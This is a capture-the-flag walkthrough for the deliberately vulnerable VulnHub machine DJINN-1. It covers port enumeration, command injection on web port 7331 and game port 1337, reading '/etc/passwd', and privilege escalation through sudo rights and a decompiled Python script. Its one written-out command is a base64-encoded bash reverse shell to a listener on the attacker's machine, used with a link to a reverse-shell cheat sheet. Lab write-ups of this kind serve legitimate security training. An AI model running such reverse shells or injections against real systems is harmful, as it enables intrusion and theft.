DJINN-1

 DJINN-1

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine DJINN-1 from the VulnHub pentesting platform.

- DJINN-1 can be downloaded from here:

https://www.vulnhub.com/entry/djinn-1,397/

- Once downloaded DJINN-1 and extracted with VirtualBox:

2 - ENUMERATION

- Scanning with Nmap we learn that  ports 21, 1337, 7331 are open:

- FTP allows Anonymous login. Also, there are 3 text files available:

- Port 1337 holds a math game:

- Port 7331 runs a web server:

- Connecting to FTP server we find the 3 text files:

- Getting creds.txt, game.txt and message.txt:

- Reading the 3 files:

- Connecting to web browser at port 7331:

- Dirbusting port 7331 we find web pages genie and wish:

- Connecting to genie:

- Connecting to wish:

- Executing command id:

- The server redirects to web page genie and outputs answer at URL:

- Same thing for command pwd:

- Same thing for command ls:

3 - EXPLOITATION

- One potential vector attack  would be to execute remotely a bash command at wish web page.

- The bash command is encoded with base64:

- Setting a nc listener session at port 4444:

- Entering the command to wish, previously decoding and passing it to bash:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTUvNDQ0NCAwPiYxCg== | base64 -d | bash

- Finally, a remote shell is triggered at Kali:

- Removing the nasty duplicated letters with command stty -echo:

- Improving the shell:

- There are home folders for users nitish and sam:

- Exploring nitish we find user.txt, but access is denied:

- Reading app.py we find a line pointing to nitish credentials:

- So folder .dev keeps file creds.txt with credentials for user nitish:

4 - CAPTURING THE 1st FLAG

- Now, the 1st flag is available:

5 - PRIVILEGE ESCALATION

- There are different ways to achieve Privilege Escalation, we will try two of them:

5.1 - Sudoers

- Checking sudoer privileges we learn that nitish can run command genie as user sam:

- Checking genie file type we discover it has setuid:

- Discovering how genie works:

- Passing some inputs to command genie:

- Finally we are able to get a shell for user sam:

- Checking sam's sudoer privileges, he can run command lago as a root:

- Running command lago with different inputs:

- Checking the file .pyc we find that it's a compiled bytecode Python script:

- Also, opening .pyc  we find a lot of words that recall of lago:

- So it seems reasonable to think that it could be a close relationship between lago and .pyc. Maybe are the same thing?

-  With the purpose of studying in dept the file, let's transfer .pyc from DIJNN-1 to Kali:

- Installing decompiler uncompyle6:

- Decompyling .pyc we find that it actually corresponds to script lago, and there is a couple of lines that give us the answer to achieve a /bin/sh shell:

- So entering word num as answer finally we get a root shell:

5.2 - Remote command injection

- Connecting with nc to port 1337 there is a math game:

- Trying a remote injection with command pwd the result is successful:

- Same thing with command ls:

- Same thing with command cat /etc/passwd:

- Setting a listening session at port 4444:

- Injecting  this remote command:

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

- Finally, a reverse shell is back at Kali:

6 - CAPTURING THE 2nd FLAG

- Going to root folder:

- Reading proof.sh:

- Executing proof.sh: